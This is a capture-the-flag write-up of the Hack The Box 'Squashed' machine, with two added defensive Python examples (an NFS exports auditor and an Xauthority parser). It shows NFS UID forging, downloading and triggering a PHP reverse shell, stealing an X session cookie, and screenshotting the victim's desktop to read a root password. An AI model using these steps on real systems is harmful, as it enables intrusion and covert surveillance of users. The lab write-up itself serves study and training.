Hack The Box Squashed Writeup

Hack The Box Squashed

Hello world and welcome to haxez and my write-up for the Squashed machine. I’ve been getting back into Hack The Box machines. I’ve started studying for the CPTS and the CBBH and thought I would do some boxes to complement the academy courses.

Information Gathering

Once the box was up, I started enumerating it with Nmap. I targeted all ports, ran safe checks, and asked for version information. The results showed that ports 22, 80, 111, and 2049 were open, which suggested a web server with a publicly exposed NFS service.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 09:55 GMT
Nmap scan report for 10.129.228.109
Host is up (0.022s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp    open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      38714/udp6  mountd
|   100005  1,2,3      40865/tcp6  mountd
|   100005  1,2,3      48822/udp   mountd
|   100005  1,2,3      59769/tcp   mountd
|   100021  1,3,4      38567/tcp6  nlockmgr
|   100021  1,3,4      40531/tcp   nlockmgr
|   100021  1,3,4      46286/udp   nlockmgr
|   100021  1,3,4      53135/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
40531/tcp open  nlockmgr 1-4 (RPC #100021)
41359/tcp open  mountd   1-3 (RPC #100005)
43719/tcp open  mountd   1-3 (RPC #100005)
59769/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.66 seconds
Port 80 and NFS are open.

Nmap Squashed

Network File System Enumeration

Rather than brute forcing SSH or checking out the website on port 80, I decided to check out the Network File System service. To do this, I used the showmount command and pointed it at the IP address of the machine. The results from showmount showed two exports: one for a user called ross and one for the web server.

┌─[joe@parrot]─[~]
└──╼ $sudo showmount -e 10.129.228.109
Export list for 10.129.228.109:
/home/ross    *
/var/www/html *
NFS Showmount

Squashed Foothold

In order to get a foothold on Squashed, I mounted the /var/www/html NFS export. Listing the parent directory then showed that the mount was owned by user ID 2017.

┌─[joe@parrot]─[~]
└──╼ $sudo mount -t nfs 10.129.228.109:/var/www/html /mnt/www
┌─[joe@parrot]─[~]
└──╼ $ls -laSH /mnt
total 13
dr-xr-xr-x  1 root root     4192 Mar  9 09:35 hgfs
drwxr-xr-x 14 1001 scanner  4096 Mar  9 09:19 ross
drwxr-xr--  5 2017 www-data 4096 Mar  9 09:35 www
drwxr-xr-x  1 root root      262 Mar  8 09:31 ..
drwxr-xr-x  1 root root       22 Mar  9 09:35 .

I created my own user with that user ID and switched to it. I moved into the mounted html directory and used wget to download a PHP reverse shell from the pentestmonkey GitHub page.

$ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
--2023-03-09 09:39:25--  https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5491 (5.4K) [text/plain]
Saving to: ‘php-reverse-shell.php’
php-reverse-shell.php                           100%[============================================>]   5.36K  --.-KB/s    in 0s      
2023-03-09 09:39:25 (57.3 MB/s) - ‘php-reverse-shell.php’ saved [5491/5491]

After setting the listener IP in the reverse shell, I started a netcat listener and used curl to trigger the shell.

┌─[joe@parrot]─[~]
└──╼ $sudo curl http://10.129.228.109/php-reverse-shell.php

This gave me a shell on Squashed as the user alex. I upgraded the shell using the Python pty and stty trick and was able to capture the user flag.

Squashed User Flag
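The foothold above works because the export is served to any client (`*`) with the default AUTH_SYS security flavour and without all_squash, so the server trusts whatever UID the client presents; creating a local user with UID 2017 is enough to be treated as the owner, and the same trick is repeated for ross’s home directory in the next section. The checker below is an added example, not code from the write-up, that parses an /etc/exports file and flags exactly those options. The sample exports text is constructed: it uses the two paths showmount reported, but their options are assumed, since the box’s real file was never seen.

```python
import re

# Constructed sample /etc/exports. The first two paths are the exports
# showmount reported; their options are assumed, since the box's real
# file was never seen. The last two lines show safer variants.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home/ross    *(rw,sync,no_subtree_check)
/var/www/html *(rw,sync,no_subtree_check,no_root_squash)
/srv/share    10.0.0.0/24(ro,sync,root_squash,all_squash,anonuid=65534)
/srv/kerb     *(rw,sec=krb5p)
"""

# client part, optionally followed by "(opt,opt,...)"
ENTRY_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return (path, client, [options]) for every client spec in the file.

    exportfs syntax is a path followed by whitespace-separated client(opts)
    specs. A spec with no client part ("(rw)") applies to every host, which
    is the classic "/path * (rw)" typo, so it is recorded as client "*".
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:]
        for spec in specs:
            m = ENTRY_RE.match(spec)
            if m is None:
                continue
            client = m.group(1) or "*"
            opts = [o for o in (m.group(2) or "").split(",") if o]
            entries.append((path, client, opts))
    return entries


def audit_exports(text):
    """Flag the export options that let a client forge UIDs, as on Squashed."""
    findings = []
    for path, client, opts in parse_exports(text):
        world = client in ("*", "0.0.0.0/0", "::/0")
        kerberos = any(o.startswith("sec=krb5") for o in opts)
        if "no_root_squash" in opts:
            findings.append((path, client,
                             "no_root_squash: root on any allowed client is root here"))
        if world and not kerberos and "all_squash" not in opts:
            findings.append((path, client,
                             "world-mountable over AUTH_SYS without all_squash: "
                             "any client can present the owner's UID"))
        if world and "rw" in opts:
            findings.append((path, client, "writable by every host"))
    return findings


if __name__ == "__main__":
    for path, client, why in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {client}: {why}")
```

Run it against a real file with `audit_exports(open("/etc/exports").read())`. The fix for the pattern on this box is to restrict the client list, add all_squash (or a Kerberos flavour such as sec=krb5p so UIDs are no longer client-asserted), and not export home directories to the world at all.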

Squashed Privilege Escalation

In order to elevate privileges on Squashed, I mounted the ross NFS export. Next, I created a user with the same user ID as ross, switched to it, and started looking around.

┌─[joe@parrot]─[~]
└──╼ $sudo mount -t nfs 10.129.228.109:/home/ross /mnt/ross

┌─[joe@parrot]─[~]
└──╼ $ls -laSH /mnt
total 13
dr-xr-xr-x  1 root root     4192 Mar  9 10:11 hgfs
drwxr-xr-x 14 1001 scanner  4096 Mar  9 09:19 ross
drwxr-xr--  5 htbs www-data 4096 Mar  9 10:10 www
drwxr-xr-x  1 root root      262 Mar  8 09:31 ..
drwxr-xr-x  1 root root       22 Mar  9 09:35 .

┌─[joe@parrot]─[~]
└──╼ $sudo useradd htbross

┌─[joe@parrot]─[~]
└──╼ $sudo usermod -u 1001 htbross

┌─[joe@parrot]─[~]
└──╼ $sudo su htbross

$ ls -laSh /mnt/ross
total 64K
drwxr-xr-x 14 htbross scanner 4.0K Mar  9 09:19 .
drwx------ 11 htbross scanner 4.0K Oct 21 15:57 .cache
drwx------ 12 htbross scanner 4.0K Oct 21 15:57 .config
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Desktop
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Documents
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Downloads
drwx------  3 htbross scanner 4.0K Oct 21 15:57 .gnupg
drwx------  3 htbross scanner 4.0K Oct 21 15:57 .local
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Music
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Pictures
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Public
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Templates
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Videos
-rw-------  1 htbross scanner 2.5K Mar  9 09:19 .xsession-errors
-rw-------  1 htbross scanner 2.5K Dec 27 15:33 .xsession-errors.old
-rw-------  1 htbross scanner   57 Mar  9 09:19 .Xauthority
drwxr-xr-x  1 root    root      22 Mar  9 09:35 ..
lrwxrwxrwx  1 root    root       9 Oct 20 14:24 .bash_history -> /dev/null
lrwxrwxrwx  1 root    root       9 Oct 21 14:07 .viminfo -> /dev/null

At this point, I had no idea what I was looking for. Normally, I would just drop an SSH key in the authorized_keys file and SSH to the box. However, that wasn’t the way this box was intended to be completed. I resorted to looking at the official walkthrough, and in hindsight the .Xauthority file is a dead giveaway. You can look up what the file is for and what its presence suggests, but to keep this short, it stores the cookies that authorise connections to X sessions. We can steal the cookie and use it to snoop on ross.

Cat the contents of the file and base64 encode it so it isn’t gibberish. Then decode it back into the /tmp directory of Squashed via your reverse shell as alex.

$ cat /mnt/ross/.Xauthority
squashed.htb0MIT-MAGIC-COOKIE-1��Ȃ���).S��P���$ 

$ cat /mnt/ross/.Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCVh8iC8NLjKS5TkZBQgIyC

$ echo AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCVh8iC8NLjKS5TkZBQgIyC | base64 -d > /tmp/.Xauthority
Xauth
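To see what is actually inside that 57-byte file, here is an added example (not code from the write-up) that parses the Xauthority file format; its only input is the base64 string printed above. Each entry holds a family code, a host, a display number, the authorisation protocol name and the authorisation data. For MIT-MAGIC-COOKIE-1 the data is a plain 16-byte bearer secret, so the file’s 0600 mode is the only thing protecting it, which is exactly what an NFS export with forgeable UIDs defeats.

```python
import base64
import struct

# The base64 the write-up printed for ross's .Xauthority (57 bytes, as in
# the directory listing).
XAUTH_B64 = ("AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCV"
             "h8iC8NLjKS5TkZBQgIyC")

# Family codes from Xauth.h; 256 (FamilyLocal) means "this host, by name".
FAMILY_NAMES = {0: "Internet", 6: "Internet6", 254: "Wild", 256: "Local"}


def parse_xauthority(data: bytes) -> list:
    """Parse the binary Xauthority format into a list of entry dicts.

    Each entry is a big-endian uint16 family followed by four
    length-prefixed (uint16, big-endian) fields: address, display number,
    auth protocol name and auth data. A truncated file raises ValueError
    instead of silently yielding a short cookie.
    """
    entries = []
    off = 0

    def field() -> bytes:
        nonlocal off
        if off + 2 > len(data):
            raise ValueError("truncated length field")
        (n,) = struct.unpack_from(">H", data, off)
        off += 2
        chunk = data[off:off + n]
        if len(chunk) != n:
            raise ValueError("truncated Xauthority field")
        off += n
        return chunk

    while off < len(data):
        if off + 2 > len(data):
            raise ValueError("truncated family field")
        (family,) = struct.unpack_from(">H", data, off)
        off += 2
        address, number, name, auth = field(), field(), field(), field()
        entries.append({
            "family": FAMILY_NAMES.get(family, str(family)),
            "address": address.decode("latin-1"),
            "display": number.decode("latin-1"),
            "name": name.decode("latin-1"),
            "cookie_hex": auth.hex(),
        })
    return entries


def parse_b64(b64: str) -> list:
    """Convenience wrapper for the base64 form the write-up used."""
    return parse_xauthority(base64.b64decode(b64))


def summarize(entries) -> list:
    """One line per entry with the cookie redacted, safe to put in a report."""
    return [
        f'{e["family"]} {e["address"]}:{e["display"]} {e["name"]} '
        f'({len(e["cookie_hex"]) // 2}-byte cookie, redacted)'
        for e in entries
    ]


if __name__ == "__main__":
    for line in summarize(parse_b64(XAUTH_B64)):
        print(line)
```

The single entry decodes to family Local, host squashed.htb, display 0 and protocol MIT-MAGIC-COOKIE-1, which is why the later `w` output showing ross on display :0 is all the attacker needs to pair with it. When reporting on a file like this, log the summary rather than the cookie itself.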

Then, as alex, we can do some more enumeration and find out which display ross’s session is running on. Apparently you can just run w and it will show you. I had no idea. The more you know.

alex@squashed:/tmp$ w
w
10:26:43 up  1:07,  1 user,  load average: 0.02, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
ross     tty7     :0               09:19    1:07m  9.11s  0.05s /usr/libexec/gnome-session-binary --systemd --session=gnome

Now that we know the display is :0, we can take a screenshot of the desktop with the following command… cool.

xwd -root -screen -silent -display :0 > /tmp/screen.xwd

Then, to retrieve the screenshot, we spin up a Python web server in /tmp, browse to it, and download the file.

alex@squashed:/tmp$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.126 - - [09/Mar/2023 10:33:30] "GET / HTTP/1.1" 200 -
10.10.14.126 - - [09/Mar/2023 10:33:30] code 404, message File not found
10.10.14.126 - - [09/Mar/2023 10:33:30] "GET /favicon.ico HTTP/1.1" 404 -
10.10.14.126 - - [09/Mar/2023 10:33:58] "GET /screen.xwd HTTP/1.1" 200 -

Open the image; mine defaulted to GIMP, which I love, so no complaints. It shows a password manager displaying the root password.

Password Manager root

Squashed root Flag

With the password for root we can simply switch to the root user and capture the root flag from the root directory. That completes the box.

$ su root
Password: cahxxxxxxxi9A
whoami
root
cat /root/root.txt
692xxxxxxxxxxxxxxxxb159c

Conclusion

This was a fun box with an interesting privilege escalation technique. Completing it is fairly easy in terms of skill, provided you understand the files you see. LinEnum didn’t flag the file as a privilege escalation vector, so I wouldn’t have had a clue without the walkthrough. The great thing about Hack The Box machines is that every one teaches you something new.